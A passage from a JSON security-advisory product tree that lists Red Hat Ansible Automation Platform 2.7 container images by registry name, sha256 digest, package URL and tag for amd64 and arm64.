"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3A7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator\u0026tag=1781020387"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3Aee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9\u0026tag=1780937494"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9\u0026tag=1781036795"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9\u0026tag=1781038454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3Aabaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9\u0026tag=1781093888"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3Afcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9\u0026tag=1781118924"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator\u0026tag=1781102902"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9\u0026tag=1781104458"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/receptor-rhel9\u0026tag=1780679838"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9\u0026tag=1780741250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9\u0026tag=1780676763"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Af75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9\u0026tag=1781101539"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3A2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9\u0026tag=1781112811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9\u0026tag=1780676633"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ac014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9\u0026tag=1781042555"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ad02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9\u0026tag=1781025813"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator\u0026tag=1781012601"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Af07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9\u0026tag=1781030318"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3Addb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9\u0026tag=1781097765"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Aafca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator\u0026tag=1781020811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Adaefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9\u0026tag=1781028735"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Ab58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator\u0026tag=1780676212"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Abd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9\u0026tag=1781030866"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Aa961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9\u0026tag=1781044628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Ade3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator\u0026tag=1781031115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3Ae78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9\u0026tag=1781112272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9\u0026tag=1781102816"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Ac738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator\u0026tag=1780676321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Aadca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9\u0026tag=1781105214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3Ad71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator\u0026tag=1781020387"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3Ace4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9\u0026tag=1780937494"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9\u0026tag=1781036795"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9\u0026tag=1781038454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ac4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9\u0026tag=1781093888"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
